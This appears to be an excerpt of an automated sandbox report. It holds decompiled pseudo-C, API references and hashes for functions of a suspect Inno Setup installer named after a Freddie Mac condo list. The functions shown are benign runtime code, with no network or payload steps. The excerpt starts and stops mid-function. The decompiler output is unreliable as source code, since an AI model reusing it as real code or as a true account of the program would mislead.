					}
					if( *_t71 != 0) {
						L12:
						E00406368( &(_t73[0xc]));
						_t72 = _t72 - 1;
						if(_t72 > 0) {
							goto L5;
						}
						goto L13;
					}
					asm("lock cmpxchg [esi], edx");
					if(0 != 0) {
						goto L12;
					}
					_t71[8] = GetCurrentThreadId();
					_t71[4] = 1;
					 *_t73 = 1;
					break;
				}
				L32:
				return  *_t73 & 0x000000ff;
			}

0x0040668f
0x00406691
0x00406693
0x00406696
0x00406696
0x0040669d
0x004066a4
0x00000000
0x00000000
0x004066b2
0x004066b9
0x00406751
0x00406751
0x00406751
0x00406755
0x00000000
0x00000000
0x00406760
0x00406766
0x00000000
0x00000000
0x00000000
0x00000000
0x00406768
0x00406768
0x0040676d
0x00406773
0x0040677a
0x00406784
0x00406789
0x00406790
0x00406797
0x004067a5
0x004067b3
0x004067a7
0x004067af
0x004067af
0x004067a5
0x004067b9
0x004067db
0x004067e4
0x004067e8
0x004067ec
0x00000000
0x004067bb
0x004067bb
0x004067c0
0x00000000
0x00000000
0x004067cc
0x004067d2
0x00000000
0x00000000
0x004067d4
0x00000000
0x004067d4
0x004067bb
0x004067f1
0x004067f1
0x00406800
0x00406807
0x0040680a
0x0040680a
0x00000000
0x00406800
0x00000000
0x00406751
0x004066c4
0x004066ca
0x004066d0
0x0040672c
0x0040672f
0x00000000
0x00000000
0x00406736
0x0040673e
0x00406744
0x0040674f
0x00000000
0x0040674f
0x00406746
0x00000000
0x00406746
0x00000000
0x004066d2
0x004066d5
0x00000000
0x004066e4
0x004066e4
0x004066e4
0x00000000
0x004066ed
0x004066f0
0x00000000
0x00000000
0x004066f5
0x0040671e
0x00406722
0x00406727
0x0040672a
0x00000000
0x00000000
0x00000000
0x0040672a
0x004066fe
0x00406704
0x00000000
0x00000000
0x0040670b
0x0040670e
0x00406715
0x00000000
0x00406715
0x00406811
0x0040681c

APIs

Part of subcall function 00406B30: GetCurrentThreadId.KERNEL32 ref: 00406B33

GetTickCount.KERNEL32 ref: 004066BF
GetTickCount.KERNEL32 ref: 004066D7
GetCurrentThreadId.KERNEL32 ref: 00406706
GetTickCount.KERNEL32 ref: 00406731
GetTickCount.KERNEL32 ref: 00406768
GetTickCount.KERNEL32 ref: 00406792
GetCurrentThreadId.KERNEL32 ref: 00406802

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: CountTick$CurrentThread
String ID:
API String ID: 3968769311-0
Opcode ID: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
Instruction ID: 4198438d609b3d92ee1caba3903e9c970ac06421e97b93dd9799f90313ce3de1
Opcode Fuzzy Hash: d68569389b1874426944dbdaf855cb9de5dde29c2ee803ff208aff5c928e2b2c
Instruction Fuzzy Hash: 664182712083419ED721AE3CC58431BBAD5AF80358F16C93ED4DA973C1EB7988958756

Uniqueness

Uniqueness Score: -1.00%

Function 004971AC, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 87
threadCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E004971AC(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v5;
				char _v12;
				char _v16;
				char _v20;
				void* _t23;
				char _t29;
				void* _t50;
				intOrPtr _t55;
				char _t57;
				intOrPtr _t59;
				void* _t64;
				void* _t66;
				void* _t68;
				void* _t69;
				intOrPtr _t70;

				_t64 = __edi;
				_t57 = __edx;
				_t50 = __ecx;
				_t68 = _t69;
				_t70 = _t69 + 0xfffffff0;
				_v20 = 0;
				if(__edx != 0) {
					_t70 = _t70 + 0xfffffff0;
					_t23 = E004062B0(_t23, _t68);
				}
				_t49 = _t50;
				_v5 = _t57;
				_t66 = _t23;
				_push(_t68);
				_push(0x4972a5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t70;
				E00405CB8(0);
				_t3 = _t66 + 0x2c; // 0x266461
				 *(_t66 + 0xf) =  *_t3 & 0x000000ff ^ 0x00000001;
				if(_t50 == 0 ||  *(_t66 + 0x2c) != 0) {
					_t29 = 0;
				} else {
					_t29 = 1;
				}
				 *((char*)(_t66 + 0xd)) = _t29;
				if( *(_t66 + 0x2c) != 0) {
					 *((intOrPtr*)(_t66 + 8)) = GetCurrentThread();
					 *((intOrPtr*)(_t66 + 4)) = GetCurrentThreadId();
				} else {
					if(_a4 == 0) {
						_t12 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, 0, _t12, 4, _t66);
					} else {
						_t9 = _t66 + 4; // 0x495548
						 *((intOrPtr*)(_t66 + 8)) = E004078E0(0, E004970B8, _a4, _t9, 0x10004, _t66);
					}
					if( *((intOrPtr*)(_t66 + 8)) == 0) {
						E0041DFB0(GetLastError(), _t49, 0, _t66);
						_v16 = _v20;
						_v12 = 0x11;
						_t55 =  *0x4ba740; // 0x40ea6c
						E0041F35C(_t49, _t55, 1, _t64, _t66, 0,  &_v16);
						E0040711C();
					}
				}
				_pop(_t59);
				 *[fs:eax] = _t59;
				_push(0x4972ac);
				return E00407A20( &_v20);
			}

0x004971ac
0x004971ac
0x004971ac
0x004971ad
0x004971af
0x004971b6
0x004971bb
0x004971bd
0x004971c0
0x004971c0
0x004971c5
0x004971c7
0x004971ca
0x004971ce
0x004971cf
0x004971d4
0x004971d7
0x004971de
0x004971e3
0x004971e9
0x004971ee
0x004971f6
0x004971fa
0x004971fa
0x004971fa
0x004971fc
0x00497203
0x00497284
0x0049728c
0x00497205
0x00497209
0x0049722c
0x0049723e
0x0049720b
0x00497211
0x00497224
0x00497224
0x00497245
0x00497251
0x00497259
0x0049725c
0x00497266
0x00497273
0x00497278
0x00497278
0x00497245
0x00497291
0x00497294
0x00497297
0x004972a4

APIs

GetLastError.KERNEL32(00000000,004972A5,?,00495544,00000000), ref: 00497247

Part of subcall function 004078E0: CreateThread.KERNEL32 ref: 0040793A

GetCurrentThread.KERNEL32 ref: 0049727F
GetCurrentThreadId.KERNEL32 ref: 00497287

Strings

XtI, xrefs: 00497214, 0049722F
0@G, xrefs: 0049726E
l@, xrefs: 00497266

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Thread$Current$CreateErrorLast
String ID: 0@G$XtI$l@
API String ID: 3539746228-385768319
Opcode ID: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
Instruction ID: 1159262e71bebd7e921a745d602ab6fc0c684f98ff6f66721209a3575415716a
Opcode Fuzzy Hash: a4dc03de5b91be95089a9569e035fcfb45136a4f5e23dfed5c7514759ebadc63
Instruction Fuzzy Hash: 2B31E2309287449EDB10EBB68C427AB7FE49F09304F40C87EE455973C1DA3CA545C799

Uniqueness

Uniqueness Score: -1.00%

Function 00406424, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 63
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00406424(void* __edx) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char* _t23;
				intOrPtr _t29;
				intOrPtr _t39;
				void* _t41;
				void* _t43;
				intOrPtr _t44;

				_t41 = _t43;
				_t44 = _t43 + 0xfffffff4;
				_v16 = 0;
				if(GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "GetLogicalProcessorInformation") == 0) {
					L10:
					_v8 = 0x40;
					goto L11;
				} else {
					_t23 =  &_v16;
					_push(_t23);
					_push(0);
					L00403808();
					if(_t23 != 0 || GetLastError() != 0x7a) {
						goto L10;
					} else {
						_v12 = E004053F0(_v16);
						_push(_t41);
						_push(E004064D2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t44;
						_push( &_v16);
						_push(_v12);
						L00403808();
						_t29 = _v12;
						if(_v16 <= 0) {
							L8:
							_pop(_t39);
							 *[fs:eax] = _t39;
							_push(E004064D9);
							return E0040540C(_v12);
						} else {
							while( *((short*)(_t29 + 4)) != 2 ||  *((char*)(_t29 + 8)) != 1) {
								_t29 = _t29 + 0x18;
								_v16 = _v16 - 0x18;
								if(_v16 > 0) {
									continue;
								} else {
									goto L8;
								}
								goto L12;
							}
							_v8 =  *(_t29 + 0xa) & 0x0000ffff;
							E00407210();
							L11:
							return _v8;
						}
					}
				}
				L12:
			}

0x00406425
0x00406427
0x0040642c
0x00406446
0x004064d9
0x004064d9
0x00000000
0x0040644c
0x0040644c
0x0040644f
0x00406450
0x00406452
0x00406459
0x00000000
0x00406465
0x0040646d
0x00406472
0x00406473
0x00406478
0x0040647b
0x00406481
0x00406485
0x00406486
0x0040648b
0x00406492
0x004064bc
0x004064be
0x004064c1
0x004064c4
0x004064d1
0x00406494
0x00406494
0x004064af
0x004064b2
0x004064ba
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x004064ba
0x004064a5
0x004064a8
0x004064e0
0x004064e6
0x004064e6
0x00406492
0x00406459
0x00000000

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetLogicalProcessorInformation), ref: 00406439
GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040643F
GetLastError.KERNEL32(00000000,?,GetLogicalProcessorInformation), ref: 0040645B

Strings

@, xrefs: 004064D9
GetLogicalProcessorInformation, xrefs: 0040642F
kernel32.dll, xrefs: 00406434

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressErrorHandleLastModuleProc
String ID: @$GetLogicalProcessorInformation$kernel32.dll
API String ID: 4275029093-79381301
Opcode ID: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
Instruction ID: 8f5f9a4eb212fab3c4852abc810e80ead921d34dcce11bc4c58bc7a6251dba94
Opcode Fuzzy Hash: 60cbd49ddd200d6d95d4e054eb85e0ada012a2fb0b751d352b1ba5f8ec496b5f
Instruction Fuzzy Hash: 52116371D00208BEDB20EFA5D84576EBBA8EB40705F1184BBF815F32C1D67D9A908B1D

Uniqueness

Uniqueness Score: -1.00%

Function 004076B8, Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 43%

			E004076B8(void* __ecx) {
				long _v4;
				void* _t3;
				void* _t9;

				if( *0x4bb058 == 0) {
					if( *0x4b7032 == 0) {
						_push(0);
						_push("Error");
						_push("Runtime error     at 00000000");
						_push(0);
						L00403780();
					}
					return _t3;
				} else {
					if( *0x4bb344 == 0xd7b2 &&  *0x4bb34c > 0) {
						 *0x4bb35c();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1d,  &_v4, 0);
					_t9 = E00408240(0x40774c);
					return WriteFile(GetStdHandle(0xfffffff5), _t9, 2,  &_v4, 0);
				}
			}

0x004076c0
0x00407726
0x00407728
0x0040772a
0x0040772f
0x00407734
0x00407736
0x00407736
0x0040773c
0x004076c2
0x004076cb
0x004076db
0x004076db
0x004076f7
0x0040770a
0x0040771e
0x0040771e

APIs

GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718

Strings

Error, xrefs: 0040772A
Runtime error at 00000000, xrefs: 004076EA, 0040772F

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: FileHandleWrite
String ID: Error$Runtime error at 00000000
API String ID: 3320372497-2970929446
Opcode ID: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
Instruction ID: db14fa18f2a627875cbdcf208ba1e0af1765c14dc112cf76e17f9611cef7a876
Opcode Fuzzy Hash: 06894f85802f1aca0c877f66b17294aabd6ee15dfccdef8be12070d3d0c4ead6
Instruction Fuzzy Hash: DFF0C2A1A8C24079FA2077A94C47F5A269C8740B16F108A3FF610B61D1C7FD6584937E

Uniqueness

Uniqueness Score: -1.00%

Function 00420524, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420524(void* __ebx, void* __esi) {
				intOrPtr _t4;
				intOrPtr _t6;

				if(E0041FF68(6, 0) == 0) {
					_t4 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"NTDLL.DLL"), L"RtlCompareUnicodeString");
					 *0x4be914 = _t4;
					 *0x4be910 = E00420428;
					return _t4;
				} else {
					_t6 = E0040E1A8(__ebx, __esi, GetModuleHandleW(L"kernel32.dll"), L"CompareStringOrdinal");
					 *0x4be910 = _t6;
					return _t6;
				}
			}

0x00420532
0x0042055f
0x00420564
0x00420569
0x00420573
0x00420534
0x00420544
0x00420549
0x0042054e
0x0042054e

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,CompareStringOrdinal,004B5A2E,00000000,004B5A41), ref: 0042053E

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

GetModuleHandleW.KERNEL32(NTDLL.DLL,RtlCompareUnicodeString,004B5A2E,00000000,004B5A41), ref: 00420559

Strings

NTDLL.DLL, xrefs: 00420554
RtlCompareUnicodeString, xrefs: 0042054F
CompareStringOrdinal, xrefs: 00420534
kernel32.dll, xrefs: 00420539

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: CompareStringOrdinal$NTDLL.DLL$RtlCompareUnicodeString$kernel32.dll
API String ID: 1883125708-3870080525
Opcode ID: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
Instruction ID: 4ba185d4141586243d2650af69d43cb091b5da9faf927984522c9bbe9ad7037f
Opcode Fuzzy Hash: b7bf267469631706014ef5b6a976724c1e29590bd579973413919bb6c8384525
Instruction Fuzzy Hash: 04E08CF0B4232036E644FB672C0769929C51B85709BD04A3F7004BA1D7DBBE42659E2E

Uniqueness

Uniqueness Score: -1.00%

Function 0042931C, Relevance: 9.1, APIs: 6, Instructions: 144
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0042931C(short* __eax, intOrPtr __ecx, signed short* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				signed short* _v808;
				void* __ebp;
				signed char _t55;
				signed int _t64;
				void* _t72;
				intOrPtr* _t83;
				void* _t103;
				void* _t105;
				void* _t108;
				void* _t109;
				intOrPtr* _t118;
				void* _t122;
				intOrPtr _t123;
				char* _t124;
				void* _t125;

				_t110 = __ecx;
				_v780 = __ecx;
				_v808 = __edx;
				_v776 = __eax;
				if((_v808[0] & 0x00000020) == 0) {
					E00428FDC(0x80070057);
				}
				_t55 =  *_v808 & 0x0000ffff;
				if((_t55 & 0x00000fff) != 0xc) {
					_push(_v808);
					_push(_v776);
					L00427254();
					return E00428FDC(_v776);
				} else {
					if((_t55 & 0x00000040) == 0) {
						_v792 = _v808[4];
					} else {
						_v792 =  *(_v808[4]);
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t103 = _v788 - 1;
					if(_t103 < 0) {
						L9:
						_push( &_v772);
						_t64 = _v788;
						_push(_t64);
						_push(0xc);
						L00427828();
						_t123 = _t64;
						if(_t123 == 0) {
							E00428D34(_t110);
						}
						E00429278(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t123;
						_t105 = _v788 - 1;
						if(_t105 < 0) {
							L14:
							_t107 = _v788 - 1;
							if(E00429294(_v788 - 1, _t125) != 0) {
								L00427840();
								E00428FDC(_v792);
								L00427840();
								E00428FDC( &_v260);
								_v780(_t123,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t72 = E004292C4(_t107, _t125);
						} else {
							_t108 = _t105 + 1;
							_t83 =  &_v768;
							_t118 =  &_v260;
							do {
								 *_t118 =  *_t83;
								_t118 = _t118 + 4;
								_t83 = _t83 + 8;
								_t108 = _t108 - 1;
							} while (_t108 != 0);
							do {
								goto L14;
							} while (_t72 != 0);
							return _t72;
						}
					} else {
						_t109 = _t103 + 1;
						_t122 = 0;
						_t124 =  &_v772;
						do {
							_v804 = _t124;
							_push(_v804 + 4);
							_t23 = _t122 + 1; // 0x1
							_push(_v792);
							L00427830();
							E00428FDC(_v792);
							_push( &_v784);
							_t26 = _t122 + 1; // 0x1
							_push(_v792);
							L00427838();
							E00428FDC(_v792);
							 *_v804 = _v784 -  *((intOrPtr*)(_v804 + 4)) + 1;
							_t122 = _t122 + 1;
							_t124 = _t124 + 8;
							_t109 = _t109 - 1;
						} while (_t109 != 0);
						goto L9;
					}
				}
			}

0x0042931c
0x00429328
0x0042932e
0x00429334
0x00429344
0x0042934b
0x0042934b
0x00429356
0x00429364
0x004294ef
0x004294f6
0x004294f7
0x00000000
0x0042936a
0x0042936d
0x0042938b
0x0042936f
0x0042937a
0x0042937a
0x0042939a
0x004293a6
0x004293a9
0x00429416
0x0042941c
0x0042941d
0x00429423
0x00429424
0x00429426
0x0042942b
0x0042942f
0x00429431
0x00429431
0x0042943c
0x00429447
0x00429452
0x0042945b
0x0042945e
0x0042947a
0x00429481
0x0042948c
0x004294a3
0x004294a8
0x004294bc
0x004294c1
0x004294d4
0x004294d4
0x004294dd
0x00429460
0x00429460
0x00429461
0x00429467
0x0042946d
0x0042946f
0x00429471
0x00429474
0x00429477
0x00429477
0x0042947a
0x00000000
0x00000000
0x00000000
0x0042947a
0x004293ab
0x004293ab
0x004293ac
0x004293ae
0x004293b4
0x004293b6
0x004293c5
0x004293c6
0x004293d0
0x004293d1
0x004293d6
0x004293e1
0x004293e2
0x004293ec
0x004293ed
0x004293f2
0x0042940d
0x0042940f
0x00429410
0x00429413
0x00429413
0x00000000
0x004293b4
0x004293a9

APIs

SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 004293D1
SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 004293ED
SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 00429426
SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 004294A3
SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 004294BC
VariantCopy.OLEAUT32(?,?), ref: 004294F7

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ArraySafe$BoundIndex$CopyCreateVariant
String ID:
API String ID: 351091851-0
Opcode ID: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
Instruction ID: 2fed5c09d90993a71d142947efe00684c7910c2ed580f9cb9a97fb5731140b2d
Opcode Fuzzy Hash: 098dc979d013d57468a629589b458cb88fc05e19e5f0a5a7df6b54d31b1502c0
Instruction Fuzzy Hash: 4B51EE75A012299FCB21DB59D981BDAB3FCAF0C304F8041DAF548E7211D634AF858F65

Uniqueness

Uniqueness Score: -1.00%

Function 004AFA44, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 44
windowCOMMON

Download Yara Rule

C-Code - Quality: 34%

			E004AFA44(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				void* _t24;
				intOrPtr _t28;
				void* _t31;
				void* _t32;
				intOrPtr _t35;

				_t32 = __esi;
				_t31 = __edi;
				_push(0);
				_push(0);
				_t24 = __eax;
				_push(_t35);
				_push(0x4aface);
				_push( *[fs:eax]);
				 *[fs:eax] = _t35;
				if(( *0x4c1d61 & 0x00000001) == 0) {
					E00407A20( &_v8);
				} else {
					E00407E48( &_v8, L"/ALLUSERS\r\nInstructs Setup to install in administrative install mode.\r\n/CURRENTUSER\r\nInstructs Setup to install in non administrative install mode.\r\n");
				}
				_push(L"The Setup program accepts optional command line parameters.\r\n\r\n/HELP, /?\r\nShows this information.\r\n/SP-\r\nDisables the This will install... Do you wish to continue? prompt at the beginning of Setup.\r\n/SILENT, /VERYSILENT\r\nInstructs Setup to be silent or very silent.\r\n/SUPPRESSMSGBOXES\r\nInstructs Setup to suppress message boxes.\r\n/LOG\r\nCauses Setup to create a log file in the user\'s TEMP directory.\r\n/LOG=\"filename\"\r\nSame as /LOG, except it allows you to specify a fixed path/filename to use for the log file.\r\n/NOCANCEL\r\nPrevents the user from cancelling during the installation process.\r\n/NORESTART\r\nPrevents Setup from restarting the system following a successful installation, or after a Preparing to Install failure that requests a restart.\r\n/RESTARTEXITCODE=exit code\r\nSpecifies a custom exit code that Setup is to return when the system needs to be restarted.\r\n/CLOSEAPPLICATIONS\r\nInstructs Setup to close applications using files that need to be updated.\r\n/NOCLOSEAPPLICATIONS\r\nPrevents Setup from closing applications using files that need to be updated.\r\n/FORCECLOSEAPPLICATIONS\r\nInstructs Setup to force close when closing applications.\r\n/FORCENOCLOSEAPPLICATIONS\r\nPrevents Setup from force closing when closing applications.\r\n/LOGCLOSEAPPLICATIONS\r\nInstructs Setup to create extra logging when closing applications for debugging purposes.\r\n/RESTARTAPPLICATIONS\r\nInstructs Setup to restart applications.\r\n/NORESTARTAPPLICATIONS\r\nPrevents Setup from restarting applications.\r\n/LOADINF=\"filename\"\r\nInstructs Setup to load the settings from the specified file after having checked the command line.\r\n/SAVEINF=\"filename\"\r\nInstructs Setup to save installation settings to the specified file.\r\n/LANG=language\r\nSpecifies the internal name of the language to use.\r\n/DIR=\"x:\\dirname\"\r\nOverrides the default directory name.\r\n/GROUP=\"folder name\"\r\nOverrides the default folder name.\r\n/NOICONS\r\nInstructs Setup to initially check the Don\'t create a Start Menu folder check box.\r\n/TYPE=type name\r\nOverrides the default setup type.\r\n/COMPONENTS=\"comma separated list of component names\"\r\nOverrides the default component settings.\r\n/TASKS=\"comma separated list of task names\"\r\nSpecifies a list of tasks that should be initially selected.\r\n/MERGETASKS=\"comma separated list of task names\"\r\nLike the /TASKS parameter, except the specified tasks will be merged with the set of tasks that would have otherwise been selected by default.\r\n/PASSWORD=password\r\nSpecifies the password to use.\r\n");
				_push(_v8);
				_push(_t24);
				_push(0x4b0f94);
				_push(L"For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline");
				E004087C4( &_v12, _t24, 5, _t31, _t32);
				MessageBoxW(0, E004084EC(_v12), L"Setup", 0x10);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E004AFAD5);
				return E00407A80( &_v12, 2);
			}

0x004afa44
0x004afa44
0x004afa47
0x004afa49
0x004afa4c
0x004afa50
0x004afa51
0x004afa56
0x004afa59
0x004afa63
0x004afa77
0x004afa65
0x004afa6d
0x004afa6d
0x004afa7c
0x004afa81
0x004afa84
0x004afa85
0x004afa8a
0x004afa97
0x004afaae
0x004afab5
0x004afab8
0x004afabb
0x004afacd

APIs

MessageBoxW.USER32(00000000,00000000,Setup,00000010), ref: 004AFAAE

Strings

The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in, xrefs: 004AFA7C
Setup, xrefs: 004AFA9E
/ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat, xrefs: 004AFA68
For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline, xrefs: 004AFA8A

Memory Dump Source

Source File: 00000001.00000002.382758812.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.382606073.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386469518.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386595318.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.386659243.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.386717244.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Message
String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
API String ID: 2030045667-3391638011
Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D

Uniqueness

Uniqueness Score: -1.00%

Function 0042F9B8, Relevance: 7.8, APIs: 5, Instructions: 335
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
